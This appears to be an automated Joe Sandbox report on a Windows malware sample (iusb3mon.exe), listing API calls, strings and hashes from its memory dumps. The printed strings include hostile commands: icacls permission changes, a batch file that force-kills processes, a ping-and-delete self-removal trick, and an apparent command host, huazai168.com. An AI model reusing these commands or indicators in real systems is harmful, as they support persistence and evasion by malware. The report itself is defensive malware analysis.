Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
Instruction ID: 7d7027be09c5716cf25a21fc5917f273a8b85fd09bc6bc422d9879b39dc29c01
Opcode Fuzzy Hash: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
Instruction Fuzzy Hash: C4E08C32A11228EBCB14EB8CC908D9AF7FDFB84B00B510096F901E3200CA70DE01C7D0

Function 0057DB1C Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
Instruction ID: 001fdab990b719e754c737355c6f7553f5b66f389838d0a30402bf42216d8272
Opcode Fuzzy Hash: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
Instruction Fuzzy Hash: B7C01274000D0086CE29A910D2F53A43B74FB92782FC0068CC80B0A64ACE1A9C83FA20

Function 04D72772 Relevance: 78.9, APIs: 16, Strings: 29, Instructions: 173filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 04D72A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,04D72661,c:\inst.ini), ref: 04D72A2B
Part of subcall function 04D72A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,04D72661,c:\inst.ini), ref: 04D72A40
Part of subcall function 04D72A15: CloseHandle.KERNEL32(00000000,?,04D72661,c:\inst.ini), ref: 04D72A4D

Part of subcall function 04D71C74: SetFileAttributesA.KERNEL32(00000000,00000080,04D7682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 04D71C88

Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 04D727B0
DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 04D727B9
DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 04D727BC
Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 04D727C3
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 04D727D3
LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 04D72849
GetProcAddress.KERNEL32(00000000), ref: 04D72850
GetTickCount.KERNEL32 ref: 04D7289E
GetTickCount.KERNEL32 ref: 04D728D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 04D72901
CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 04D7291E
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 04D72956
CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 04D7295F
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 04D7296A
DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 04D7297B
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 04D7299E

Strings

Plugin32.dll, xrefs: 04D728A5, 04D728A8
C:\ProgramData\Data\upx.rar, xrefs: 04D72788, 04D7278F, 04D727BB, 04D7296E
d, xrefs: 04D7280D
l, xrefs: 04D72815
e, xrefs: 04D7281D
A, xrefs: 04D72845
p, xrefs: 04D72831
c:\tzfz, xrefs: 04D7277E, 04D72976
T, xrefs: 04D72825
C:\ProgramData\data\upx.rar, xrefs: 04D72919
KERNEL32.dll, xrefs: 04D727E9, 04D727EC
t, xrefs: 04D7283D
., xrefs: 04D72809
h, xrefs: 04D72841
Ru%d%s, xrefs: 04D7293B, 04D72941
C:\ProgramData\upx.rar, xrefs: 04D72795, 04D7279C, 04D727B2
G, xrefs: 04D72819
l, xrefs: 04D72811
E, xrefs: 04D727ED
e, xrefs: 04D72829
a, xrefs: 04D72839
m, xrefs: 04D7282D
N, xrefs: 04D727F5
R, xrefs: 04D727F1
K, xrefs: 04D727E4
.dll, xrefs: 04D72942
.dll, xrefs: 04D72932
P, xrefs: 04D72835
t, xrefs: 04D72821

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: .$.dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$G$K$KERNEL32.dll$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$d$e$e$h$l$l$m$p$t$t
API String ID: 3823570417-2945788138
Opcode ID: 569d710302bec91e659a4b10e381807e9c0d423ba189c79ea98e47d9b185734d
Instruction ID: 067a7db600f7335e534e7d9a55ded9df9d773bd142791f3f7833279e2bbeca38
Opcode Fuzzy Hash: 569d710302bec91e659a4b10e381807e9c0d423ba189c79ea98e47d9b185734d
Instruction Fuzzy Hash: 0F7186619082C8EEFF11D7E4DC09BDE7FB99F16308F044189E144AA2C2D7BA5648CB75

Function 04D7274E Relevance: 77.2, APIs: 15, Strings: 29, Instructions: 170filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 04D72A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,04D72661,c:\inst.ini), ref: 04D72A2B
Part of subcall function 04D72A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,04D72661,c:\inst.ini), ref: 04D72A40
Part of subcall function 04D72A15: CloseHandle.KERNEL32(00000000,?,04D72661,c:\inst.ini), ref: 04D72A4D

Part of subcall function 04D71C74: SetFileAttributesA.KERNEL32(00000000,00000080,04D7682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 04D71C88

Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 04D727B0
DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 04D727B9
DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 04D727BC
Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 04D727C3
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 04D727D3
LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 04D72849
GetProcAddress.KERNEL32(00000000), ref: 04D72850
GetTickCount.KERNEL32 ref: 04D7289E
GetTickCount.KERNEL32 ref: 04D728D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 04D72901
CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 04D7291E
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 04D72956
CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 04D7295F
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 04D7296A
DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 04D7297B
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 04D7299E

Strings

Plugin32.dll, xrefs: 04D728A5, 04D728A8
C:\ProgramData\Data\upx.rar, xrefs: 04D72788, 04D7278F, 04D727BB, 04D7296E
d, xrefs: 04D7280D
l, xrefs: 04D72815
e, xrefs: 04D7281D
A, xrefs: 04D72845
p, xrefs: 04D72831
c:\tzfz, xrefs: 04D7277E, 04D72976
T, xrefs: 04D72825
C:\ProgramData\data\upx.rar, xrefs: 04D72919
KERNEL32.dll, xrefs: 04D727E9, 04D727EC
t, xrefs: 04D7283D
., xrefs: 04D72809
h, xrefs: 04D72841
Ru%d%s, xrefs: 04D7293B, 04D72941
C:\ProgramData\upx.rar, xrefs: 04D72795, 04D7279C, 04D727B2
G, xrefs: 04D72819
l, xrefs: 04D72811
E, xrefs: 04D727ED
e, xrefs: 04D72829
a, xrefs: 04D72839
m, xrefs: 04D7282D
N, xrefs: 04D727F5
R, xrefs: 04D727F1
K, xrefs: 04D727E4
.dll, xrefs: 04D72942
.dll, xrefs: 04D72932
P, xrefs: 04D72835
t, xrefs: 04D72821

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: .$.dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$G$K$KERNEL32.dll$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$d$e$e$h$l$l$m$p$t$t
API String ID: 3823570417-2945788138
Opcode ID: d7a6e206d32d67157e75064c25335e2abed41af5b2d8ecc90bf1be1a3ee5bbf4
Instruction ID: 99f1d4281d98cc9486ee41a949f41147455f528de13515a3de22b18708871d6d
Opcode Fuzzy Hash: d7a6e206d32d67157e75064c25335e2abed41af5b2d8ecc90bf1be1a3ee5bbf4
Instruction Fuzzy Hash: 2D61A3309082C8EEFF12D7A4DC49BEE7FB59F16318F044189E144AA2D2D7BA5648CB75

Function 04D71C8F Relevance: 73.7, APIs: 21, Strings: 21, Instructions: 200filesleeplibraryCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 04D71CA3

Part of subcall function 04D71C74: SetFileAttributesA.KERNEL32(00000000,00000080,04D7682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 04D71C88

Sleep.KERNEL32(000003E8), ref: 04D71CDF
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg1), ref: 04D71CEC
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg), ref: 04D71CEF
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao), ref: 04D71CF6
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\ziliao.jpg), ref: 04D71CFD
Sleep.KERNEL32(000003E8), ref: 04D71D04
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D71D18
LoadLibraryA.KERNEL32(0000004B,?), ref: 04D71D8C
GetProcAddress.KERNEL32(00000000), ref: 04D71D93
GetTickCount.KERNEL32 ref: 04D71DDF
GetTickCount.KERNEL32 ref: 04D71E17
lstrcatA.KERNEL32(?,?), ref: 04D71E3F
CreateFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg,40000000,00000002,00000000,00000002,00000080,00000000), ref: 04D71E56
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000), ref: 04D71E8A
CloseHandle.KERNEL32(00000025), ref: 04D71E93
Sleep.KERNEL32(000003E8), ref: 04D71E9E
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 04D71ECA
TerminateProcess.KERNEL32(00000000), ref: 04D71ED7
ExitProcess.KERNEL32 ref: 04D71EDE
GetFileAttributesA.KERNEL32(?), ref: 04D71F05

Strings

KERNEL32.dll, xrefs: 04D71D26
P, xrefs: 04D71D75
C:\ProgramData\Microsoft\Program\ziliao.jpg1, xrefs: 04D71CA9, 04D71CAF, 04D71CE5
Plugin32.dll, xrefs: 04D71DE6, 04D71DE9
G, xrefs: 04D71D59
A, xrefs: 04D71D85
open, xrefs: 04D71EC4
T, xrefs: 04D71D65
Ru%d%s, xrefs: 04D71E74, 04D71E7A
p, xrefs: 04D71D71
cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone", xrefs: 04D71C9E
t, xrefs: 04D71D7D
t, xrefs: 04D71D61
a, xrefs: 04D71D79
e, xrefs: 04D71D69
m, xrefs: 04D71D6D
C:\ProgramData\Microsoft\ziliao.jpg, xrefs: 04D71CCD, 04D71CF8
C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 04D71CB5, 04D71CBB, 04D71CEE, 04D71E55, 04D71EA5, 04D71EAC
e, xrefs: 04D71D5D
h, xrefs: 04D71D81
C:\ProgramData\Microsoft\Program\ziliao, xrefs: 04D71CC2, 04D71CF1

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Delete$Sleep$AttributesCountProcessTick$AddressCloseCreateExecExecuteExitHandleLibraryLoadModuleNameProcShellTerminateWritelstrcat
String ID: A$C:\ProgramData\Microsoft\Program\ziliao$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Microsoft\Program\ziliao.jpg1$C:\ProgramData\Microsoft\ziliao.jpg$G$KERNEL32.dll$P$Plugin32.dll$Ru%d%s$T$a$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$e$e$h$m$open$p$t$t
API String ID: 1333362825-3008771302
Opcode ID: 9d86ed1ac019f25acf8636397283c3304daa2197332ebb0e916153b0978f18de
Instruction ID: 4912c9b846c8d981b46fedaf0573e7a93b0ee9d6ff72e03bcba9a31da87b3fe0
Opcode Fuzzy Hash: 9d86ed1ac019f25acf8636397283c3304daa2197332ebb0e916153b0978f18de
Instruction Fuzzy Hash: F88163619042C8EEFB0197B8CC48FEE7FBDDF16318F044289E154A6281D7BA5A48CB75

Function 04D7739A Relevance: 60.1, APIs: 1, Strings: 39, Instructions: 79COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04D77480

Part of subcall function 04D791B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
Part of subcall function 04D791B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

Strings

s, xrefs: 04D7746D
r, xrefs: 04D77435
v, xrefs: 04D7745D
c, xrefs: 04D77465
lSet\Services\%s, xrefs: 04D773A5
S, xrefs: 04D773ED
o, xrefs: 04D77429
Y, xrefs: 04D773F1
t, xrefs: 04D77431
%, xrefs: 04D77475
e, xrefs: 04D77455
r, xrefs: 04D77415
M, xrefs: 04D77401
S, xrefs: 04D773F5
lSet\Services\%s, xrefs: 04D77487
u, xrefs: 04D7740D
\, xrefs: 04D77471
Console, xrefs: 04D77493
o, xrefs: 04D77439
E, xrefs: 04D773FD
e, xrefs: 04D77445
s, xrefs: 04D77479
C, xrefs: 04D77409
S, xrefs: 04D77451
n, xrefs: 04D7741D
t, xrefs: 04D77449
e, xrefs: 04D77419
C, xrefs: 04D77425
\, xrefs: 04D7744D
n, xrefs: 04D7742D
i, xrefs: 04D77461
r, xrefs: 04D77411
T, xrefs: 04D773F9
r, xrefs: 04D77459
\, xrefs: 04D77405
l, xrefs: 04D7743D
e, xrefs: 04D77469
S, xrefs: 04D77441
t, xrefs: 04D77421

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadwsprintf
String ID: %$C$C$Console$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
API String ID: 1476185493-1609218977
Opcode ID: 84df2b2752ef4cc1f687f211c3fdd5cdd66af709e284869a921b677e1b357a29
Instruction ID: 4c583e86138ed3c5c7d1e8e3c69271722ecc258a8804100128c761efde0b56a1
Opcode Fuzzy Hash: 84df2b2752ef4cc1f687f211c3fdd5cdd66af709e284869a921b677e1b357a29
Instruction Fuzzy Hash: 4831DE51D0C6C9EDFF02C6A888587DFBFB55B26249F0840D8D1943A282C6FF575887BA

Function 04D73DF2 Relevance: 56.1, APIs: 24, Strings: 8, Instructions: 142threadprocesssleepCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 04D73E0C
WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 04D73E14
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D73E1B

Part of subcall function 04D72A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,04D72661,c:\inst.ini), ref: 04D72A2B
Part of subcall function 04D72A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,04D72661,c:\inst.ini), ref: 04D72A40
Part of subcall function 04D72A15: CloseHandle.KERNEL32(00000000,?,04D72661,c:\inst.ini), ref: 04D72A4D

Sleep.KERNEL32(c:\del,?,?), ref: 04D73E38

Part of subcall function 04D729CE: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,75920F00,?,04D73E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D729E4
Part of subcall function 04D729CE: WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,04D73E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D729FC
Part of subcall function 04D729CE: CloseHandle.KERNEL32(00000000,?,04D73E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D72A09

Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D73E4B
WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 04D73E53
Sleep.KERNEL32(000003E8,?,?), ref: 04D73E5A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 04D73E6A
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 04D73E83
GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 04D73E9A
SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 04D73EB7
GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,?), ref: 04D73F32
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 04D73F3F
GetCurrentThread.KERNEL32 ref: 04D73F43
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 04D73F50
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04D73F69
SetPriorityClass.KERNEL32(?,00000040,?,?,?,?,?,?,?,?), ref: 04D73F78
SetThreadPriority.KERNEL32(?,000000F1,?,?,?,?,?,?,?,?), ref: 04D73F7F
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 04D73F84
GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?), ref: 04D73F94
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 04D73F9B
GetCurrentThread.KERNEL32 ref: 04D73F9E
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 04D73FA5
ExitProcess.KERNEL32 ref: 04D73FA8

Strings

cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone", xrefs: 04D73E0F
C:\ProgramData\Microsoft\del.bat, xrefs: 04D73E16, 04D73E3A, 04D73E4E
cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone", xrefs: 04D73E07
> nul, xrefs: 04D73EE7
c:\del, xrefs: 04D73E21
COMSPEC, xrefs: 04D73E95
D, xrefs: 04D73F20
/c ping -n 2 127.0.0.1 > nul && del , xrefs: 04D73EC3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$PriorityThread$CurrentProcess$ClassCreateExecSleep$CloseHandleNameWrite$AttributesDeleteEnvironmentExitModulePathResumeShortVariable
String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$C:\ProgramData\Microsoft\del.bat$COMSPEC$D$c:\del$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone"
API String ID: 1606893727-1022896001
Opcode ID: 98d9f87c46d2cdf86d5328b508ab2889a870fd24e69b2568bcd3c72b498d94ed
Instruction ID: fc588d9bbafccb0bfbf44602aeb60663500165d5177419bd3df4209d6daf73fc
Opcode Fuzzy Hash: 98d9f87c46d2cdf86d5328b508ab2889a870fd24e69b2568bcd3c72b498d94ed
Instruction Fuzzy Hash: 20414E72A50258BBEB20ABE1DC49FEF7BACEF84751F004555F205E2140EA74AE448F65

Function 04D7510D Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 287registrystringsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D75112
wsprintfA.USER32 ref: 04D75148
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 04D7515A
GetLastError.KERNEL32 ref: 04D75166
ReleaseMutex.KERNEL32(00000000), ref: 04D75174
CloseHandle.KERNEL32(00000000), ref: 04D7517B
RegOpenKeyExA.ADVAPI32(80000001,Console,00000000,00020019,?), ref: 04D751D2
RegQueryValueExA.ADVAPI32(?,Groupfenzhu,00000000,?,00000000,?), ref: 04D751F3
RegCloseKey.ADVAPI32(?), ref: 04D75210
RegQueryValueExA.ADVAPI32(?,Remarkbeizhu,00000000,?,00000000,?), ref: 04D75228
RegCloseKey.ADVAPI32(?), ref: 04D75245
RegQueryValueExA.ADVAPI32(?,MarkTime,00000000,?,00000000,?), ref: 04D7525D
RegCloseKey.ADVAPI32(?), ref: 04D7526D
_rand.LIBCMT ref: 04D75288
Sleep.KERNEL32(00000BB8,?,00006365), ref: 04D75292
lstrcatA.KERNEL32(?,?), ref: 04D75347
lstrcatA.KERNEL32(00000000,huazai168.com), ref: 04D75370
strcmp.MSVCRT ref: 04D75382
GetTickCount.KERNEL32 ref: 04D75397
GetTickCount.KERNEL32 ref: 04D753B3
lstrcpyA.KERNEL32(04DA2AD4,?,?,?,00006365,00000000), ref: 04D753ED
WaitForSingleObject.KERNEL32(?,00000064,?), ref: 04D7543F
Sleep.KERNEL32(000001F4), ref: 04D7544C

Strings

Default, xrefs: 04D751F9
%s:%d:%s, xrefs: 04D75142
MarkTime, xrefs: 04D75255
Remarkbeizhu, xrefs: 04D75220
Console, xrefs: 04D751C8
SYSTEM\CurrentControlSet\Services\, xrefs: 04D75198
Groupfenzhu, xrefs: 04D751E8
huazai168.com, xrefs: 04D7513D, 04D7536A

Memory Dump Source

